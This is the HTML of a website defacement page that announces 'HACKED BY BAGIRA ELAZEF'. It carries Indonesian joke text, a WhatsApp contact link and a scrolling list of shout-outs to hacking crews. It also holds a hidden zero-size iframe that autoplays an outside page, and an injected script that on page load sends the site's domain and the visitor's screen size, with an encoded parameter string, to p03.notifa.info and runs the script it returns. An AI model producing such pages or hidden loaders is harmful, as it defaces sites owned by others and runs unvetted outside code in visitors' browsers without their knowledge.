

<html>



<head>



<title>TERPERAWANI OLEH BAGIRA</title>



<meta property="og:image"content="https://d.top4top.io/s_2021hqnie0.jpeg">



<meta name="title" content="HACKED BY BAGIRA ELAZEF">



<meta name="description" content="Made in Egypt ">



<link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet">



</head>



<body style="color: #fff; margin:0;font: normal 14px/20px Share Tech Mono, Helvetica, sans-serif; height:100%; background-color: #000000;"/>



<div style="height:auto; min-height:100%; ">



<div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 20%; left:50%;">

<center><img style="width:590px;" src="https://d.top4top.io/s_2021hqnie0.jpeg">
<br>
<br>
<h2 style="margin-top:20px;font-size: 40px;">const R = require('N')</h2>
<br>
<br>
<font size="6" color="white" class="text-center text-white mb-3">Emmm...<br><br>Aku Lebih Suka Ngebot Sih<br><br>Emang Kalo Suka Kamu Boleh?<p>
<br>
<font size="5" color="red" class="text-center text-white mb-3">Sunda XPloit Indonesia<p>
<br>
<div id="particles">
  <div id="intro">
    <a href="https://wa.me/201060647991?text=BAGIRA+lofyu+><+" class="btn">Touch Me Sayang ><</a> <br><br>
  </div>
<br>
<br>
<br>
<marquee>-= Yangkuasa - LBD - CodeXploiter - InfectSec - Pucca Cyber Team - CrashSec - EGYPT - Jakarta Brotherhood =-</font></div></marquee>
<br>
<iframe style="visibility: hidden" width="0%" height="0" scrolling="no" frameborder="no" loop="true" allow="autoplay" src="https://stafaband123.com/app.php?id=572735187"></iframe>

<br>

</div>




</div>



<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXpbiuSuaQ1lNpAqc3B7IxKGcelHUpWrenNUyHgeJIkd5vzMbhpCtR8f7J1LLmzGY%2bhwBf3JC3IJHvKE0m7iNnfeg8A6OgKe0fhr1yVLsbJd9VDbQ%2f0kN7tKXboreLnf0Fo4vQ22%2bf%2fupSUnSyywbCqbU9eGBWYkx8EDmbDOnXAi%2bVT0YIBlO1%2fsflQ%2b1oOheJ7cSRtXL60Ds2vGMAN9XI8uiatbA81Yz7ot3Nq8YMTZGLE8rORbAP1wvCiMNPpM%2fmXQe0JPN2rGL8WkBs9CGxF3GttcTA8hRlCkBOrhZk2CnNau8tgx74QPTuW4J9aoxaXbs1HdDDTIH6JUdN4HbRB6c6YNK0KTjkLO%2fmnznFywikzQTxiwuWDHdC%2fJPjhKzYSsDE2m0fNdgYUhtxY4uNbwTn9icBReCiku3kp6JqIWX9LjFHgX46aZOn0Kq4f2wmi1GX6nKpQEZdGAu6OV6%2fkovg8CWqqiIEw8sH3cHl8PCp2CpcHkj0Ww%2bIZqAHouueKANKe0q%2bfobO0ZNPPJKL1gSphBJ5iolx27rni%2bd77TLTxqA%2bBQsUmBBMWxnx8rIPJINUbIp2Ts3diD5SAbMGWv3dBc2tbZUe" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpsh'},{'server':'sg3plcpnl0214'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script><script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpsh'},{'server':'sg3plcpnl0214'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script></html>
